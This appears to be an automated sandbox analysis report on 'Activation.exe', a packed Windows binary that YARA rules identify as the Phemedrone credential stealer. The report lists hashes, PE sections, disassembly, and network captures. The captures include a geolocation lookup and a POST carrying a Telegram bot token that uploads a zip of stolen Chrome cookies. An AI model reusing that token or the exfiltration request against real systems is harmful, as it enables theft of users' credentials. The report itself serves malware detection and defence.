                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.958368471713319
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:Activation.exe
                                                                                      File size:3'361'979 bytes
                                                                                      MD5:aa3a94ba72728df41a815b060f5e9c52
                                                                                      SHA1:baec525e25786a3787b90b300a383f814e65377d
                                                                                      SHA256:573a6686dba8217e51b0c4fd9b041a4bf3ce193d6be69e201a6edcefa3dc42e6
                                                                                      SHA512:99772aa3f7837a205f1657730cafc93d8bdcd3cd3826669402f344db5ba28d48c84521dba2a7eab2e7a0c5b3b064fe8c364b9665d03253a94f6177565ef82962
                                                                                      SSDEEP:98304:Jj3eS6htWV1940j0wk0IySMGfEsiC0BDm+:0S67WVRjplgMJRVb
                                                                                      TLSH:0EF5337CE28C7EB0CAE559771662FCCCE3C978A1EE84F13AF98745234964D53346AA40
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z=Pg.........."...0.............X.V.. ........@.. .......................@......Ml3...`................................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x96e058
                                                                                      Entrypoint Section:.boot
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67503D7A [Wed Dec 4 11:31:06 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:4328f7206db519cd4e82283211d98e83
                                                                                      Instruction
                                                                                      call 00007F6B40CD8D00h
                                                                                      push ebx
                                                                                      mov ebx, esp
                                                                                      push ebx
                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                      mov edi, dword ptr [ebx+10h]
                                                                                      cld
                                                                                      mov dl, 80h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8B9Ch
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8C03h
                                                                                      xor eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8C97h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      je 00007F6B40CD8BBAh
                                                                                      push edi
                                                                                      mov eax, eax
                                                                                      sub edi, eax
                                                                                      mov al, byte ptr [edi]
                                                                                      pop edi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      jmp 00007F6B40CD8B4Bh
                                                                                      mov eax, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007F6B40CD8B9Ch
                                                                                      sub eax, ebx
                                                                                      mov ebx, 00000001h
                                                                                      jne 00007F6B40CD8BDAh
                                                                                      mov ecx, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc ecx, ecx
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007F6B40CD8B9Ch
                                                                                      push esi
                                                                                      mov esi, edi
                                                                                      sub esi, ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2403a | 0x50 | .imports
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26000 | 0x5c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x2000 | 0x1e000 | 0xe06a | 0a7a4d1f98f58e4112d33fb1e99f24a2 | False | 1.0004525674499565 | data | 7.9859308748687345 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 | 0x20000 | 0x5be | 0x299 | bc596e8d3a7b5713dcb1220c0cba7e28 | False | 1.0165413533834586 | data | 7.617134030526502 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
 | 0x22000 | 0xc | 0xf | d62928ee2fe5646fc9cd8c5ffbff9f7f | False | 1.6 | data | 3.906890595608518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.imports | 0x24000 | 0x2000 | 0x200 | a7cbe73c362247cc12a9acc1ef31a2c6 | False | 0.16796875 | data | 1.1486424297373619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x26000 | 0x2000 | 0x600 | cc36ad3b2feeeb075ddda0ecdac14894 | False | 0.4244791666666667 | data | 4.165617506167152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x28000 | 0x546000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot | 0x56e000 | 0x325a00 | 0x3258bb | c07bf4455b809e2b473dffd8fc047c8f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x26090 | 0x334 | data | English | United States | 0.424390243902439
RT_MANIFEST | 0x263d4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.5489795918367347
DLL | Import
kernel32.dll | GetModuleHandleA
mscoree.dll | _CorExeMain
| Language of compilation system | Country where language is spoken | Map |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-04T15:12:01.549797+0100 | 2843856 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 | 1 | 192.168.2.9 | 49746 | 149.154.167.220 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| Dec 4, 2024 15:11:57.525448084 CET | 54521 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 4, 2024 15:11:57.672821999 CET | 53 | 54521 | 1.1.1.1 | 192.168.2.9 |
| Dec 4, 2024 15:11:59.680078030 CET | 52533 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 4, 2024 15:11:59.817507029 CET | 53 | 52533 | 1.1.1.1 | 192.168.2.9 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| Dec 4, 2024 15:11:57.525448084 CET | 192.168.2.9 | 1.1.1.1 | 0x4542 | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 15:11:59.680078030 CET | 192.168.2.9 | 1.1.1.1 | 0xd779 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| Dec 4, 2024 15:11:40.453835964 CET | 1.1.1.1 | 192.168.2.9 | 0x5597 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 4, 2024 15:11:40.453835964 CET | 1.1.1.1 | 192.168.2.9 | 0x5597 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 15:11:57.672821999 CET | 1.1.1.1 | 192.168.2.9 | 0x4542 | No error (0) | get.geojs.io | | 104.26.1.100 | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 15:11:57.672821999 CET | 1.1.1.1 | 192.168.2.9 | 0x4542 | No error (0) | get.geojs.io | | 172.67.70.233 | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 15:11:57.672821999 CET | 1.1.1.1 | 192.168.2.9 | 0x4542 | No error (0) | get.geojs.io | | 104.26.0.100 | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 15:11:59.817507029 CET | 1.1.1.1 | 192.168.2.9 | 0xd779 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
                                                                                      • get.geojs.io
                                                                                      • api.telegram.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| 0 | 192.168.2.9 | 49739 | 104.26.1.100 | 443 | 7588 | C:\Users\user\Desktop\Activation.exe |
| Timestamp | Bytes transferred | Direction | Data |
| 2024-12-04 14:11:59 UTC | 76 | OUT | GET /v1/ip/geo.json HTTP/1.1 |
                                                                                      Host: get.geojs.io
                                                                                      Connection: Keep-Alive
| 2024-12-04 14:11:59 UTC | 1122 | IN | HTTP/1.1 200 OK |
                                                                                      Date: Wed, 04 Dec 2024 14:11:59 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-request-id: 31e8eb79ca30b52162b67535372a4f8b-ASH
                                                                                      strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-methods: GET
                                                                                      pragma: no-cache
                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      geojs-backend: ash-01
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xT6EdFCNtwhEKJpZ4D537NtXDb%2FAfAaER%2BPY99TGUMAax4SoDp0YjbYz8%2B3cvXdp6nJtTPU2cdgARiiAXZEioBg9R8C7iz7WOjbYB8g3BGf3MLeur1dqd3dAzjwZWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ecc6387ef104327-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1602&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1822721&cwnd=245&unsent_bytes=0&cid=b4e2af7cfea83f47&ts=611&x=0"
| 2024-12-04 14:11:59 UTC | 247 | IN | Data Raw: 31 34 36 0d 0a 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 |
Data Ascii: 146{"timezone":"America\/New_York","accuracy":20,"city":"New York","asn":3356,"organization":"AS3356 LEVEL3","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","country":"United States","
| 2024-12-04 14:11:59 UTC | 86 | IN | Data Raw: 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 38 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d 0a 0d 0a |
Data Ascii: region":"New York","latitude":"40.7123","longitude":"-74.0068","ip":"8.46.123.228"}
| 2024-12-04 14:11:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a |
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| 1 | 192.168.2.9 | 49746 | 149.154.167.220 | 443 | 7588 | C:\Users\user\Desktop\Activation.exe |
| Timestamp | Bytes transferred | Direction | Data |
| 2024-12-04 14:12:01 UTC | 384 | OUT | POST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1 |
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                      Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42cee
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 710510
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
| 2024-12-04 14:12:01 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 34 33 62 34 63 34 32 63 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 38 2e 34 36 2e 31 32 33 2e 32 32 38 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 7c 49 84 59 ca 55 2c 10 1f 01 00 00 1f 01 00 00 28 00 48 00 42 72 6f 77 73 65 72 20 44 61 74 61 2f 43 68 72 6f 6d 65 2f 43 6f 6f 6b 69 65 73 5b 44 65 66 61 75 6c 74 5d |
Data Ascii: ------------------------------8dd1443b4c42ceeContent-Disposition: form-data; name="document"; filename="[US]8.46.123.228-Phemedrone-Report.zip"Content-Type: application/octet-streamPK|IYU,(HBrowser Data/Chrome/Cookies[Default]
2024-12-04 14:12:01 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-04 14:12:03 UTC | 402 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 14:12:02 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

{"ok":false,"error_code":400,"description":"Logged out"}


Target ID: 0
Start time: 09:11:42
Start date: 04/12/2024
Path: C:\Users\user\Desktop\Activation.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Activation.exe"
Imagebase: 0xce0000
File size: 3'361'979 bytes
MD5 hash: AA3A94BA72728DF41A815B060F5E9C52
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 5
Start time: 09:12:02
Start date: 04/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
Imagebase: 0xac0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 6134c99277f01d370fa109dbe1cb8f91e3a679e9c1206365977b6ba898d5cdf0
                                                                                        • Instruction ID: 400d35daee5f9396ebd8ada46bbd58fe8650ac2cb21e6bf2bd4933a9bbccf142
                                                                                        • Opcode Fuzzy Hash: 6134c99277f01d370fa109dbe1cb8f91e3a679e9c1206365977b6ba898d5cdf0
                                                                                        • Instruction Fuzzy Hash: 86F18A30B003198FEB15DB78C85476EB7F2BF89700F2085A9D40AAB391EF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 774ed9a3367421baa6657ee6ed68f323f266c4df1445616f63ba82aeb351441b
                                                                                        • Instruction ID: 5ed0621c938615aaf88bf82580b2d9eb0fc642a0a90ab4a8e3cc3a0b5276254e
                                                                                        • Opcode Fuzzy Hash: 774ed9a3367421baa6657ee6ed68f323f266c4df1445616f63ba82aeb351441b
                                                                                        • Instruction Fuzzy Hash: 50F17930B002198FDB15DB78C85476EB7F2BF89700F2085A9D40AAB391EF74AD46DB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: a3c047a1c845a103c35c066c2d0f60578a17194e0626fc14974f0cbce038f145
                                                                                        • Instruction ID: e9e808eb813310ced52495847fd721cad5b69822cadf15ed930821867509d614
                                                                                        • Opcode Fuzzy Hash: a3c047a1c845a103c35c066c2d0f60578a17194e0626fc14974f0cbce038f145
                                                                                        • Instruction Fuzzy Hash: 44D16A30B003198FDB15DB78D85476EB7F2BF89700F2085A9D40AAB391EF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 9049732b5a6602ac596685cd2303f0e2c609e84e999fb8a856482281708cb388
                                                                                        • Instruction ID: fecd03b97ea1e8021296f9ef429ffee4700e45d75554608f9a46e14f0dde6819
                                                                                        • Opcode Fuzzy Hash: 9049732b5a6602ac596685cd2303f0e2c609e84e999fb8a856482281708cb388
                                                                                        • Instruction Fuzzy Hash: 60C18A30B002198FEB15EB38D85476EB7F2BF89700F2085A9D40AAB391DF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 41233d54d827ce10d4d0a80b78719529277da800513408035d9c25ca61b3b439
                                                                                        • Instruction ID: 7f492233aa995e530aa85cb97d5af975f1b6dc7c5a3a038210978356847fef33
                                                                                        • Opcode Fuzzy Hash: 41233d54d827ce10d4d0a80b78719529277da800513408035d9c25ca61b3b439
                                                                                        • Instruction Fuzzy Hash: 4E32E871A006189FDB14CF99C588AADB7F2FF88304F55C669E419AB365CB30ED46CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 43c09845b94f0a9a8db8d802eb85dd0099dd904afd8a336b55b4aad16f255789
                                                                                        • Instruction ID: 0af6860a7778672b8196715cbca67cc803a56bec5b23a671454646ebcf3f6887
                                                                                        • Opcode Fuzzy Hash: 43c09845b94f0a9a8db8d802eb85dd0099dd904afd8a336b55b4aad16f255789
                                                                                        • Instruction Fuzzy Hash: 0E81CF71A0020ACFDB14DFA4C499B7EB7B2FF86310F1585A9D4169B292CF309D4ACB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4<Hq
                                                                                        • API String ID: 0-1826498745
                                                                                        • Opcode ID: 94ac9580d2f5085947f3921f14f0b071193cbac85667763b8f8fda3e9a2b52ac
                                                                                        • Instruction ID: 11e27364b6f9af0749dd11e50b1f5727c2c17662825a0eb642a576b849dd58b5
                                                                                        • Opcode Fuzzy Hash: 94ac9580d2f5085947f3921f14f0b071193cbac85667763b8f8fda3e9a2b52ac
                                                                                        • Instruction Fuzzy Hash: 08816E30B002059FDB08DBB5D898B6EB7E2EF89300F24852DE556AB391DF759D068B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4<Hq
                                                                                        • API String ID: 0-1826498745
                                                                                        • Opcode ID: 5fdc34c729ed8c62dfe304c24e636d4ca4a0d58d0308d8e88de8c486174dea53
                                                                                        • Instruction ID: 7713d2b7aebcca0a35fb1be05e142855381dbd7c649fe9f060859270adf4ef7b
                                                                                        • Opcode Fuzzy Hash: 5fdc34c729ed8c62dfe304c24e636d4ca4a0d58d0308d8e88de8c486174dea53
                                                                                        • Instruction Fuzzy Hash: 65819E70B002058FDB09DB75D898B6E77E2AF8A300B28C56DD546DB391DF75DD0A8B81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
